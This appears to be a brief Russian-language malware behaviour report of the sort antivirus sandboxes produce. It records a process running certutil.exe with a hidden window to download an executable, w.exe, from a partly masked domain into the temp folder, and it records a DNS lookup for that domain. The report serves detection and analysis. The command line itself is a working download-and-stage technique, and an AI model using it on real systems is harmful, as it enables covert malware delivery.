Техническая информация
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://bl##.#ogondr.com/wp-content/plugins/ultimate-social-media-plus/images/s/w.exe %TEMP%\filename.exe
- DNS ASK bl##.#ogondr.com
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://bl##.#ogondr.com/wp-content/plugins/ultimate-social-media-plus/images/s/w.exe %TEMP%\filename.exe' (со скрытым окном)